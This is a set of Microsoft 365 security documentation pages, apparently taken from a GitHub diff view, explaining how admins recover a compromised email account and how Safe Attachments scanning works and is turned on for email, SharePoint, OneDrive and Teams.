-[Anti-malware protection in EOP](anti-malware-protection-about.md)
-
-[View mail flow reports in the EAC](/exchange/monitoring/mail-flow-reports/mail-flow-reports)
-
-[View reports for Defender for Office 365](reports-defender-for-office-365.md)
security Responding To A Compromised Email Account https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account.md
- Title: Responding to a Compromised Email Account
- - NOCSH
- - Hijacked account
- - Hacked account
- - Compromised account
-----
- - o365_security_incident_response
- - m365-security
- - m365solution-smb
- - highpri
- - tier1
-
- - TopSMBIssues
- - seo-marvel-apr2020
- - MET150
-description: Learn how to recognize and respond to a compromised email account using tools available in Microsoft 365.
- Previously updated : 6/19/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Responding to a compromised email account
--
-Access to Microsoft 365 mailboxes, data, and other services is controlled by credentials (for example a username and a password or PIN). When someone other than the intended user steals those credentials, the associated account is considered to be compromised.
-
-After an attacker steals the credentials and gains access to the account, they can access the associated Microsoft 365 mailbox, SharePoint folders, or files in the user's OneDrive. Attackers often use the compromised mailbox to send email as the original user to recipients inside and outside of the organization. Attackers using email to send data to external recipients is known as _data exfiltration_.
-
-This article explains the symptoms of account compromise and how to regain control of the compromised account.
-
-## Symptoms of a compromised Microsoft email account
-
-Users might notice and report unusual activity in their Microsoft 365 mailboxes. For example:
--- Suspicious activity, such as missing or deleted email.-- Users receiving email from the compromised account without the corresponding email in the sender's **Sent Items** folder.-- Inbox rules that weren't created by the user or admins. These rules might automatically forward email to unknown addresses or move messages to the **Notes**, **Junk Email**, or **RSS Subscriptions** folders.-- The user's display name is changed in the Global Address List.-- The user's mailbox is blocked from sending email.-- The **Sent Items** or **Deleted Items** folders in Microsoft Outlook or Outlook on the web (formerly known as Outlook Web App) contain typical messages for compromised accounts (for example, "I'm stuck in London, send money.").-- Unusual profile changes. For example, name, telephone number, or the postal code updates.-- Multiple and frequent password changes.-- Mail forwarding was recently added.-- Unusual signatures were recently added. For example, a fake banking signature or a prescription drug signature.-
-If a user reports these symptoms or other unusual symptoms, you should investigate. The Microsoft Defender portal and the Azure portal offer the following tools to help you investigate suspicious activity on a user account.
--- **Unified audit logs in the Microsoft Defender portal**: Filter the logs for activity using a date range that starts immediately before the suspicious activity occurred to today. Don't filter on specific activities during the search. For more information, see [Search the audit log](audit-log-search-defender-portal.md).--- **Microsoft Entra sign-in logs and other risk reports in the Microsoft Entra admin center**: Examine the values in these columns:
- - Review IP address
- - sign-in locations
- - sign-in times
- - sign-in success or failure
-
-> [!IMPORTANT]
-> The following button lets you test and identify suspicious account activity. You can use this information to recover a compromised account.
->
-<div class="nextstepaction">
-<p><a href="https://aka.ms/diagca" data-linktype="external">Run Tests: Compromised Accounts</a></p>
-</div>
-
-## Secure and restore email function to a compromised Microsoft 365 account and mailbox
-
-<! [!VIDEO https://videoplayercdn.osi.office.net/hub/?csid=ux-cms-en-us-msoffice&uuid=RE2jvOb&AutoPlayVideo=false] >
-
-Even after the user regains access to their account, the attacker might have left back-door entries that allow the attacker to resume control of the account.
-
-Do **all** of the following steps to regain control of the account. Go through the steps as soon as you suspect a problem and as quickly as possible to make sure that the attacker doesn't resume control of the account. These steps also help you remove any back-door entries that the attacker might have added to the account. After you do these steps, we recommend that you run a virus scan to make sure that the client computer isn't compromised.
-
-### Step 1: Reset the user's password
-
-Follow the procedures in [Reset a business password for someone](/microsoft-365/admin/add-users/reset-passwords#reset-my-admin-password).
-
-> [!IMPORTANT]
->
-> - Don't send the new password to the user through email, because the attacker still has access to the mailbox at this point.
->
-> - Be sure to use a strong password: upper and lowercase letters, at least one number, and at least one special character.
->
-> - Even if the password history requirement allows it, don't reuse any of the last five passwords. Use a unique password that the attacker can't guess.
->
-> - If the on-premises identity is federated with Microsoft 365, you must change the on-premises account password on-premises, and then notify the administrator of the compromise.
->
-> - Be sure to update app passwords. App passwords aren't automatically revoked when you reset the password. The user should delete existing app passwords and create new ones. For instructions, see [Manage app passwords for two-step verification](https://support.microsoft.com/account-billing/d6dc8c6d-4bf7-4851-ad95-6d07799387e9).
->
-> - We highly recommended that you enable multi-factor authentication (MFA) for the account. MFA is a good way to help prevent account compromise, and is very important for accounts with administrative privileges. For instructions, see [Set up multi-factor authentication](/microsoft-365/admin/security-and-compliance/set-up-multi-factor-authentication).
-
-### Step 2: Remove suspicious email forwarding addresses
-
-1. In the Microsoft 365 admin center at <https://admin.microsoft.com>, go to **Users** \> **Active users**. Or, to go directly to the **Active users** page, use <https://admin.microsoft.com/Adminportal/Home#/users>.
-
-2. On the **Active users** page, find the user account, and select it by clicking anywhere in the row other than the check box next to the name.
-
-3. In the details flyout that opens, select the **Mail** tab.
-
-4. The value **Applied** in the **Email forwarding** section indicates that mail forwarding is configured on the account.
-
- Select **Manage email forwarding**, clear the **Forward all email sent to this mailbox** check box in the **Manage email forwarding** flyout that opens, and then select **Save changes**.
-
-### Step 3: Disable suspicious Inbox rules
-
-1. Sign in to the user's mailbox using Outlook on the web.
-
-2. Select **Settings** (gear icon), enter 'rules' in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box, and then select **Inbox rules** from the results.
-
-3. On the **Rules** tab of the flyout that opens, review the existing rules, and turn off or delete any suspicious rules.
-
-### Step 4: Unblock the user from sending mail
-
-If the account was used to send spam or a high volume of email, it's likely that the mailbox has been blocked from sending mail.
-
-To unblock a mailbox from sending email, follow the procedures in [Remove blocked users from the Restricted entities page](outbound-spam-restore-restricted-users.md).
-
-### Step 5 Optional: Block the user account from signing-in
-
-> [!IMPORTANT]
-> You can block the account from signing-in until you believe it's safe to re-enable access.
-
-1. Do the following steps in the Microsoft 365 admin center at <https://admin.microsoft.com>:
- 1. Go to **Users** \> **Active users**. Or, to go directly to the **Active users** page, use <https://admin.microsoft.com/Adminportal/Home#/users>.
- 2. On the **Active users** page, find and select the user account from the list by doing one of the following steps:
- - Select the user by clicking anywhere in the row other than the check box next to the name. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-no-icon.png" border="false"::: **Block sign-in** at the top of the flyout.
- - Select the user by selecting the check box next to the name. Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> :::image type="icon" source="../../media/m365-cc-sc-no-icon.png" border="false"::: **Edit sign-in status**.
- 3. In the **Block sign-in** flyout that opens, read the information, select **Block this user from signing in**, select **Save changes**, and then select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Close** at the top of the flyout.
-
-2. Do the following steps in the Exchange admin center (EAC) at <https://admin.exchange.microsoft.com>:
- 1. Go to **Recipients** \> **Mailboxes**. Or, to go directly to the **Mailboxes** page, use <https://admin.exchange.microsoft.com/#/mailboxes>.
- 2. On the **Mailboxes** page, find and select the user from the list by doing one of the following steps:
- - Select the user by clicking anywhere in the row other than the round check box that appears next to the name.
- - Select the user by selecting the round check box that appears next to the name, and then selecting the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears on the page.
- 3. In the details flyout that opens, do the following steps:
- 1. Verify the **General** tab is selected, and then select **Manage email apps settings** in the **Email apps & mobile devices** section.
- 2. In the **Manage settings for email apps** flyout that opens, disable all of the available settings by changing the toggles to :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: **Disabled**:
- - **Outlook desktop (MAPI)**
- - **Exchange Web Services**
- - **Mobile (Exchange ActiveSync)**
- - **IMAP**
- - **POP3**
- - **Outlook on the web**
-
- When you're finished in the **Manage settings for email apps** flyout, select **Save**, and then select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Close** at the top of the flyout.
-
-### Step 6 Optional: Remove the suspected compromised account from all administrative role groups
-
-> [!NOTE]
-> You can restore the user's membership in administrative role groups after the account has been secured.
-
-1. In the Microsoft 365 admin center at <https://admin.microsoft.com>, do the following steps:
- 1. Go to **Users** \> **Active users**. Or, to go directly to the **Active users** page, use <https://admin.microsoft.com/Adminportal/Home#/users>.
- 2. On the **Active users** page, find and select the user account from the list by doing one of the following steps:
- - Select the user by clicking anywhere in the row other than the check box next to the name. In the details flyout that opens, verify the **Account** tab is selected, and then select **Manage roles** in the **Roles** section.
- - Select the user by selecting the check box next to the name. Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> :::image type="icon" source="../../media/m365-cc-sc-manage-roles-icon.png" border="false"::: **Manage roles**.
- 3. In the **Manage admin roles** flyout that opens, do the following steps:
- - Record any information that you want to restore later.
- - Remove administrative role membership by selecting **User (no admin center access)**.
-
- When you're finished in the **Manage admin roles** flyout, select **Save changes**.
-
-2. In the Microsoft Defender portal at <https://security.microsoft.com>, do the following steps:
- 1. Go to **Permissions** \> **Email & collaboration roles** \> **Roles**. Or, to go directly to the **Permissions** page, use <https://security.microsoft.com/emailandcollabpermissions>.
- 2. On the **Permissions** page, select a role group from the list.
- 3. Look for the user account in the **Members** section of the details flyout that opens. If the role group contains the user account, do the following steps:
- 1. In the **Members** section, select **Edit**.
- 2. On the **Choose members** tab of the flyout that opens, select **Edit**.
- 3. In the **Choose members** flyout that opens, select **Remove**.
- 4. In the **Members** section that appears, select the user account by selecting the check box next to the name, select **Remove**, and then select **Done**.
- 5. In the **Editing Choose members** flyout, select **Save**.
- 6. In the role group details flyout, select **Close**.
- 4. Repeat the previous steps for each role group in the list.
-
-3. In the Exchange admin center at <https://admin.exchange.microsoft.com/>, do the following steps:
- 1. Go to **Roles** \> **Admin roles**. Or to go directly to the **Admin roles** page, use <https://admin.exchange.microsoft.com/#/adminRoles>.
- 2. On the **Admin roles** page, select a role group from the list by clicking anywhere in the row other than the round check box that appears next to the name.
- 3. In the details flyout that opens, select the **Assigned** tab, and then look for the user account. If the role group contains the user account, do the following steps:
- 1. Select the user account.
- 2. Select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears, select **Yes, remove** in the warning dialog, and then select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Close** at the top of the flyout.
-
- 4. Repeat the previous steps for each role group in the list.
-
-### Step 7 Optional: Additional precautionary steps
-
-1. Verify the contents of the **Sent items** folder of the account in Outlook or Outlook on the web.
-
- You might need to inform people in your contacts list that your account was compromised. For example, the attacker might have sent messages asking your contacts for money, or the attacker might have sent a virus to hijack their computers.
-
-2. The accounts for any other services that use this account as an alternative email account might have also been compromised. After you do the steps in this article for the account in this Microsoft 365 organization, do these steps for your other accounts.
-
-3. Verify the contact information (for example, telephone numbers and addresses) of the account.
-
-## See also
--- [Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Microsoft 365](detect-and-remediate-outlook-rules-forms-attack.md)-- [Detect and Remediate Illicit Consent Grants](detect-and-remediate-illicit-consent-grants.md)-- [Internet Crime Complaint Center](https://www.ic3.gov/Home/Ransomware)-- [Securities and Exchange Commission - "Phishing" Fraud](https://www.sec.gov/investor/pubs/phishing.htm)-- To report spam email directly to Microsoft and your admin [Use the Report Message add-in](https://support.microsoft.com/office/b5caa9f1-cdf3-4443-af8c-ff724ea719d2)
security Safe Attachments About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/safe-attachments-about.md
- Title: Safe Attachments
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier1
-description: Admins can learn about the Safe Attachments feature in Microsoft Defender for Office 365.
- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Safe Attachments in Microsoft Defender for Office 365
--
-Safe Attachments in [Microsoft Defender for Office 365](mdo-about.md) provides an additional layer of protection for email attachments that have already been scanned by [anti-malware protection in Exchange Online Protection (EOP)](anti-malware-protection-about.md). Specifically, Safe Attachments uses a virtual environment to check attachments in email messages before they're delivered to recipients (a process known as _detonation_).
-
-Safe Attachments protection for email messages is controlled by Safe Attachments policies. Although there's no default Safe Attachments policy, the **Built-in protection** preset security policy provides Safe Attachments protection to all recipients (users who aren't defined in the Standard or Strict preset security policies or in custom Safe Attachments policies). For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md). You can also create Safe Attachments policies that apply to specific users, group, or domains. For instructions, see [Set up Safe Attachments policies in Microsoft Defender for Office 365](safe-attachments-policies-configure.md).
-
-The following table describes scenarios for Safe Attachments in Microsoft 365 and Office 365 organizations that include Microsoft Defender for Office 365 (in other words, lack of licensing is never an issue in the examples).
-
-|Scenario|Result|
-|||
-|Pat's Microsoft 365 E5 organization has no Safe Attachments policies configured.|Pat is protected by Safe Attachments due to the **Built-in protection** preset security policy that applies to all recipients who aren't otherwise defined in Safe Attachments policies.|
-|Lee's organization has a Safe Attachments policy that applies only to finance employees. Lee is a member of the sales department.|Lee and the rest of the sales department are protected by Safe Attachments due to the **Built-in protection** preset security policy that applies to all recipients who aren't otherwise defined in Safe Attachments policies.|
-|Yesterday, an admin in Jean's organization created a Safe Attachments policy that applies to all employees. Earlier today, Jean received an email message that included an attachment.|Jean is protected by Safe Attachments due to that custom Safe Attachments policy. <br/><br/> Typically, it takes about 30 minutes for a new policy to take effect.|
-|Chris's organization has long-standing Safe Attachments policies for everyone in the organization. Chris receives an email that has an attachment, and then forwards the message to external recipients.|Chris is protected by Safe Attachments. <br/><br/> If the external recipients are in a Microsoft 365 organization, then the forwarded messages are also protected by Safe Attachments.|
-
-Safe Attachments scanning takes place in the same region where your Microsoft 365 data resides. For more information about datacenter geography, see [Where is your data located?](https://products.office.com/where-is-your-data-located?geo=All)
-
-> [!NOTE]
-> The following features are located in the global settings of Safe Attachments policies in the Microsoft Defender portal. But, these settings are enabled or disabled globally, and don't require Safe Attachments policies:
->
-> - [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md).
-> - [Safe Documents in Microsoft 365 E5](safe-documents-in-e5-plus-security-about.md)
-
-## Safe Attachments policy settings
-
-This section describes the settings in Safe Attachments policies:
--- **Recipient filters**: Conditions and exceptions to identify the internal recipients that the policy applies to. At least one condition is required. You can use the following recipient filters for conditions and exceptions:
- - **Users**: One or more mailboxes, mail users, or mail contacts in the organization.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: One or more of the configured [accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in Microsoft 365. The recipient's primary email address is in the specified domain.
-
- You can use a condition or exception only once, but the condition or exception can contain multiple values:
-
- - Multiple **values** of the **same condition or exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_):
- - **Conditions**: If the recipient matches **any** of the specified values, the policy is applied to them.
- - **Exceptions**: If the recipient matches **any** of the specified values, the policy isn't applied to them.
-
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
--- **Safe Attachments unknown malware response**: This setting controls the action for Safe Attachments malware scanning in email messages. The available options are described in the following table:-
- |Option|Effect|Use when you want to:|
- ||||
- |**Off**|Attachments aren't scanned for malware by Safe Attachments. Messages are still scanned for malware by [anti-malware protection in EOP](anti-malware-protection-about.md).|Turn scanning off for selected recipients. <br/><br/> Prevent unnecessary delays in routing internal mail. <br/><br/> **This option is not recommended for most users. You should only use this option to turn off Safe Attachments scanning for recipients who only receive messages from trusted senders. ZAP will not quarantine messages if Safe Attachments is turned off and a malware signal is not received. For details, see [Zero-hour auto purge](zero-hour-auto-purge.md)**|
- |**Monitor**|Delivers messages with attachments and then tracks what happens with detected malware. <br/><br/> Delivery of safe messages might be delayed due to Safe Attachments scanning.|See where detected malware goes in your organization.|
- |**Block**|Prevents messages with detected malware attachments from being delivered. <br/><br/> Messages are quarantined. By default, only admins (not users) can review, release, or delete the messages.┬╣ <br/><br/> Automatically blocks future instances of the messages and attachments. <br/><br/> Delivery of safe messages might be delayed due to Safe Attachments scanning.|Protects your organization from repeated attacks using the same malware attachments. <br/><br/> This is the default value, and the recommended value in Standard and Strict [preset security policies](preset-security-policies.md).|
- |**Dynamic Delivery**|Delivers messages immediately, but replaces attachments with placeholders until Safe Attachments scanning is complete. <br/><br/> Messages that contain malicious attachments are quarantined. By default, only admins (not users) can review, release, or delete the messages.┬╣ <br/><br/> For details, see the [Dynamic Delivery in Safe Attachments policies](#dynamic-delivery-in-safe-attachments-policies) section later in this article.|Avoid message delays while protecting recipients from malicious files.|
-
- ┬╣ Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy). Users can't release their own messages that were quarantined as malware by Safe Attachments, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
--- **Redirect messages with detected attachments**: **Enable redirect** and **Send messages that contain monitored attachments to the specified email address**: For the **Monitor** action only, send messages that contain malware attachments to the specified internal or external email address for analysis and investigation.-
- The recommendation for Standard and Strict policy settings is to enable redirection. For more information, see [Safe Attachments settings](recommended-settings-for-eop-and-office365.md#safe-attachments-settings).
--- **Priority**: If you create multiple policies, you can specify the order that they're applied. No two policies can have the same priority, and policy processing stops after the first policy is applied (the highest priority policy for that recipient).-
- For more information about the order of precedence and how multiple policies are evaluated and applied, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-### Dynamic Delivery in Safe Attachments policies
-
-> [!NOTE]
-> Dynamic Delivery works only for Exchange Online mailboxes.
-
-The Dynamic Delivery action in Safe Attachments policies seeks to eliminate any email delivery delays that might be caused by Safe Attachments scanning. The body of the email message is delivered to the recipient with a placeholder for each attachment. The placeholder remains until the attachment is found to be safe, and then the attachment becomes available to open or download.
-
-If an attachment is found to be malicious, the message is quarantined.
-
-Most PDFs and Office documents can be previewed in safe mode while Safe Attachments scanning is underway. If an attachment is not compatible with the Dynamic Delivery previewer, the recipients will see a placeholder for the attachment until Safe Attachments scanning is complete.
-
-If you're using a mobile device, and PDFs aren't rendering in the Dynamic Delivery previewer on your mobile device, try opening the message in Outlook on the web (formerly known as Outlook Web App) using your mobile browser.
-
-Here are some considerations for Dynamic Delivery and forwarded messages:
--- If the forwarded recipient is protected by a Safe Attachments policy that uses the Dynamic Delivery option, then the recipient sees the placeholder, with the ability to preview compatible files.-- If the forwarded recipient is not protected by a Safe Attachments policy, the message and attachments will be delivered without any Safe Attachments scanning or attachment placeholders.-
-There are scenarios where Dynamic Delivery is unable to replace attachments in messages. These scenarios include:
--- Messages in public folders.-- Messages that are routed out of and then back into a user's mailbox using custom rules.-- Messages that are moved (automatically or manually) out of cloud mailboxes to other locations, including archive folders.-- Inbox rules move the message out of the Inbox into a different folder.-- Deleted messages.-- The user's mailbox search folder is in an error state.-- Exchange Online organizations where Exclaimer is enabled. To resolve this issue, see [KB4014438](https://support.microsoft.com/help/4014438).-- [S/MIME)](/exchange/security-and-compliance/smime-exo/smime-exo) encrypted messages.-- You configured the Dynamic Delivery action in a Safe Attachments policy, but the recipient doesn't support Dynamic Delivery (for example, the recipient is a mailbox in an on-premises Exchange organization). However, [Safe Links in Microsoft Defender for Office 365](safe-links-policies-configure.md) is able to scan Office file attachments that contain URLs (if Safe Links scanning of support Office apps is turned on in the applicable Safe Links policy).-
-## Submitting files for malware analysis
--- If you receive a file that you want to send to Microsoft for analysis, see [Submit malware and non-malware to Microsoft for analysis](submissions-submit-files-to-microsoft.md).-- If you receive an email message (with or without an attachment) that you want to submit to Microsoft for analysis, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).
security Safe Attachments For Spo Odfb Teams About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/safe-attachments-for-spo-odfb-teams-about.md
- Title: Safe Attachments for SharePoint, OneDrive, and Microsoft Teams
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - SPO_Content
- - tier2
-
- - seo-marvel-apr2020
- - seo-marvel-jun2020
-description: Learn about Microsoft Defender for Office 365 for files in SharePoint Online, OneDrive for Business, and Microsoft Teams.
- Previously updated : 6/19/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Safe Attachments for SharePoint, OneDrive, and Microsoft Teams
--
-In organizations with Microsoft Defender for Office 365, Safe Attachments for SharePoint, OneDrive, and Microsoft Teams provides an additional layer of protection against malware. After files are asynchronously scanned by the [common virus detection engine in Microsoft 365](anti-malware-protection-for-spo-odfb-teams-about.md), Safe Attachments opens files in a virtual environment to see what happens (a process known as _detonation_). As part of detonation, any password protected files are checked against a list of known passwords or patterns that are typically used by malicious actors. Safe Attachments for SharePoint, OneDrive, and Microsoft Teams also helps detect and block existing files that are identified as malicious in team sites and document libraries.
-
-Safe Attachments for SharePoint, OneDrive, and Microsoft Teams is enabled by default. To turn it on or off, see [Turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-configure.md).
-
-## How Safe Attachments for SharePoint, OneDrive, and Microsoft Teams works
-
-When Safe Attachments for SharePoint, OneDrive, and Microsoft Teams is enabled and identifies a file as malicious, the file is locked using direct integration with the file stores. The following image shows an example of a malicious file detected in a library.
--
-Although the blocked file is still listed in the document library and in web, mobile, or desktop applications, people can't open, copy, move, or share the file. But, they can delete the blocked file.
-
-Here's an example of what a blocked file looks like on a mobile device:
--
-By default, people can download a blocked file. Here's what downloading a blocked file looks like on a mobile device:
--
-SharePoint Online admins can prevent people from downloading malicious files. For instructions, see [Use SharePoint Online PowerShell to prevent users from downloading malicious files](safe-attachments-for-spo-odfb-teams-configure.md#step-2-recommended-use-sharepoint-online-powershell-to-prevent-users-from-downloading-malicious-files).
-
-To learn more about the user experience when a file has been detected as malicious, see [What to do when a malicious file is found in SharePoint Online, OneDrive, or Microsoft Teams](https://support.microsoft.com/office/01e902ad-a903-4e0f-b093-1e1ac0c37ad2).
-
-## View information about malicious files detected by Safe Attachments for SharePoint, OneDrive, and Microsoft Teams
-
-Files that are identified as malicious by Safe Attachments for SharePoint, OneDrive, and Microsoft Teams appear in [reports for Microsoft Defender for Office 365](reports-defender-for-office-365.md) and in [Explorer (and real-time detections)](threat-explorer-real-time-detections-about.md).
-
-When a file is identified as malicious by Safe Attachments for SharePoint, OneDrive, and Microsoft Teams, the file is also available in quarantine, but only to admins. For more information, see [Manage quarantined files in Defender for Office 365](quarantine-admin-manage-messages-files.md#use-the-microsoft-defender-portal-to-manage-quarantined-files-in-defender-for-office-365).
-
-## Keep these points in mind
--- Defender for Office 365 doesn't scan every single file in SharePoint Online, OneDrive for Business, or Microsoft Teams. This behavior is by design. Files are scanned asynchronously. The process uses sharing and guest activity events along with smart heuristics and threat signals to identify malicious files.--- Make sure your SharePoint sites are configured to use the [Modern experience](/sharepoint/guide-to-sharepoint-modern-experience). Visual indicators that a file is blocked are available only in the Modern experience.--- Safe Attachments for SharePoint, OneDrive, and Microsoft Teams is part of your organization's overall threat protection strategy, which includes anti-spam and anti-malware protection in Exchange Online Protection (EOP), as well as Safe Links and Safe Attachments protection in Microsoft Defender for Office 365.
security Safe Attachments For Spo Odfb Teams Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/safe-attachments-for-spo-odfb-teams-configure.md
- Title: Turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - SPO_Content
- - tier2
-description: Admins can learn how to turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams, including how to set alerts for detected files.
--- seo-marvel-apr2020- Previously updated : 6/19/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams
--
-In organizations with Microsoft Defender for Office 365, Safe Attachments for Office 365 for SharePoint, OneDrive, and Microsoft Teams protects your organization from inadvertently sharing malicious files. For more information, see [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md).
-
-You turn on or turn off Safe Attachments for Office 365 for SharePoint, OneDrive, and Microsoft Teams in the Microsoft Defender portal or in Exchange Online PowerShell.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- To turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams, you need to be a member of the **Organization Management** or **Security Administrator** role groups in the Microsoft Defender portal. For more information, see [Permissions in the Microsoft Defender portal](mdo-portal-permissions.md).--- To use SharePoint Online PowerShell to prevent people from downloading malicious files, you need to be member of the [Global Administrator](/entra/identity/role-based-access-control/permissions-reference#global-administrator) or [SharePoint Administrator](/entra/identity/role-based-access-control/permissions-reference#sharepoint-administrator) roles in Microsoft Entra ID.--- Verify that audit logging is enabled for your organization (it's on by default). For instructions, see [Turn auditing on or off](/purview/audit-log-enable-disable).--- Allow up to 30 minutes for the settings to take effect.-
-## Step 1: Use the Microsoft Defender portal to turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat policies** \> **Safe Attachments** in the **Policies** section. Or, to go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.
-
-2. On the **Safe Attachments** page, select :::image type="icon" source="../../media/m365-cc-sc-gear-icon.png" border="false"::: **Global settings**.
-
-3. In the **Global settings** flyout that opens, go to the **Protect files in SharePoint, OneDrive, and Microsoft Teams** section.
-
- Move the **Turn on Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams** toggle to the right :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: to turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams.
-
- When you're finished in the **Global settings** flyout, select **Save**.
-
-### Use Exchange Online PowerShell to turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams
-
-If you'd rather use PowerShell to turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and run the following command:
-
-```powershell
-Set-AtpPolicyForO365 -EnableATPForSPOTeamsODB $true
-```
-
-For detailed syntax and parameter information, see [Set-AtpPolicyForO365](/powershell/module/exchange/set-atppolicyforo365).
-
-## Step 2: (Recommended) Use SharePoint Online PowerShell to prevent users from downloading malicious files
-
-By default, users can't open, move, copy, or share<sup>\*</sup> malicious files that are detected by Safe Attachments for SharePoint, OneDrive, and Microsoft Teams. However, they can delete and download malicious files.
-
-<sup>\*</sup> If users go to **Manage access**, the **Share** option is still available.
-
-To prevent users from downloading malicious files, [connect to SharePoint Online PowerShell](/powershell/sharepoint/sharepoint-online/connect-sharepoint-online) and run the following command:
-
-```powershell
-Set-SPOTenant -DisallowInfectedFileDownload $true
-```
-
-**Notes**:
--- This setting affects both users and admins.-- People can still delete malicious files.-
-For detailed syntax and parameter information, see [Set-SPOTenant](/powershell/module/sharepoint-online/Set-SPOTenant).
-
-## Step 3 (Recommended) Use the Microsoft Defender portal to create an alert policy for detected files
-
-You can create an alert policy that notifies admins when Safe Attachments for SharePoint, OneDrive, and Microsoft Teams detects a malicious file. To learn more about alert policies, see [Alert policies in the Microsoft Defender portal](alert-policies-defender-portal.md).
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Alert policy**. To go directly to the **Alert policy** page, use <https://security.microsoft.com/alertpolicies>.
-
-2. On the **Alert policy** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **New alert policy** to start the new alert policy wizard.
-
-3. On the **Name your alert, categorize it, and choose a severity** page, configure the following settings:
- - **Name**: Type a unique and descriptive name. For example, **Malicious Files in Libraries**.
